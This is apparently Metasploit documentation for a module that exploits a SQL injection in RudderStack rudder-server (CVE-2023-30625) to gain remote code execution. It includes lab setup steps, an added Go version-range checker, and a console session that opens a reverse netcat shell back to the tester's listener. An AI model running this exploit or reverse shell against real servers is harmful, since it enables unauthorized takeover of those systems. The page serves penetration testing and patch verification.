metasploit-gs/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
2023-07-28 17:06:38 +02:00

Vulnerable Application

RudderStack is an open-source Customer Data Platform (CDP) that helps organizations collect, unify, and route customer data to various destinations. A Customer Data Platform is a software system that centralizes and manages customer data from multiple sources, providing a unified view of customer interactions and behaviors. RudderStack is an independent, stand-alone system with a dependency only on the database (PostgreSQL). Its backend is written in Go with a rich UI written in React.js.

This Metasploit exploit module targets a SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server. The vulnerability affects rudder-server versions before 1.3.0-rc.1. By exploiting this flaw, an attacker can execute arbitrary SQL commands, which can lead to Remote Code Execution (RCE) because the rudder role in PostgreSQL has superuser permissions by default. This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings). Check here for the full disclosure writeup.

Note: The backend code of rudder-server is written in Go and can also be compiled for Windows. Because the build instructions for Windows platforms are insufficient, the Windows target is disabled in this exploit module.
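The affected range stated above (everything before 1.3.0-rc.1) is easy to get wrong in inventory scripts because the fixed tag is a prerelease: 1.3.0-rc.0 must count as affected while 1.3.0-rc.1 and 1.3.0 must not. The Go helper below is an added example, not code from this module or from rudder-server; it compares versions by semver 2.0 precedence and assumes, as the page states, that the fix shipped exactly at 1.3.0-rc.1.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// First fixed tag named on the page; every version strictly below it is in the affected range.
const fixedVersion = "1.3.0-rc.1"
// sortKey turns "[v]MAJOR.MINOR.PATCH[-PRERELEASE]" into a string whose byte order equals
// semver 2.0 precedence, so two versions can be compared with a plain string comparison.
func sortKey(version string) (string, error) {
	head, pre, hasPre := strings.Cut(strings.TrimPrefix(strings.TrimSpace(version), "v"), "-")
	parts := strings.Split(head, ".")
	if len(parts) != 3 {
		return "", fmt.Errorf("malformed version %q", version)
	}
	var key strings.Builder
	for _, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return "", fmt.Errorf("malformed version %q", version)
		}
		fmt.Fprintf(&key, "%010d.", n) // zero-padded so 1.10.0 sorts above 1.9.0
	}
	if !hasPre {
		return key.String() + "~", nil // 0x7E outranks every prerelease key: 1.3.0 > 1.3.0-rc.1
	}
	for _, id := range strings.Split(pre, ".") {
		key.WriteByte(' ') // separator below any identifier byte: rc < rc.1, and both < release
		if n, err := strconv.Atoi(id); err == nil && n >= 0 {
			fmt.Fprintf(&key, "0%020d", n) // numeric: by value, and below alphanumeric (prefix 0 < 1)
		} else {
			key.WriteString("1" + id)
		}
	}
	return key.String(), nil
}
// IsAffected reports whether a rudder-server version lies strictly before fixedVersion.
func IsAffected(version string) (bool, error) {
	k, err := sortKey(version)
	if err != nil {
		return false, err
	}
	fixed, _ := sortKey(fixedVersion)
	return k < fixed, nil
}

func main() { fmt.Println(IsAffected("1.2.5")) } // the tag used in the test setup below: true <nil>
```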

Testing

To install the vulnerable version, follow the steps below:

  1. Download the docker-compose.yml file.
  2. Replace <your_workspace_token> in this file with your workspace token. Check here for how to obtain a workspace token.
  3. Change the rudder-server:latest image tag to rudder-server:1.2.5 inside the docker-compose.yml file.
  4. Run docker compose -f rudder-docker.yml up -d

After these steps, the rudder-server API will be exposed at http://localhost:8080/.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/rudder_server_sqli_rce
  3. Do: set RHOST [IP]
  4. Do: set RPORT [PORT]
  5. Do: check
  6. You should get a shell.

Options

Scenarios

msf6 > use exploit/multi/http/rudder_server_sqli_rce 
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/http/rudder_server_sqli_rce) > set rhosts 192.168.1.20
rhosts => 192.168.1.20
msf6 exploit(multi/http/rudder_server_sqli_rce) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf6 exploit(multi/http/rudder_server_sqli_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/rudder_server_sqli_rce) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] Detected rudder version: Unknown
[*] Triggering RCE via crafted SQL query...
id
uid=70(postgres) gid=70(postgres) groups=70(postgres),70(postgres)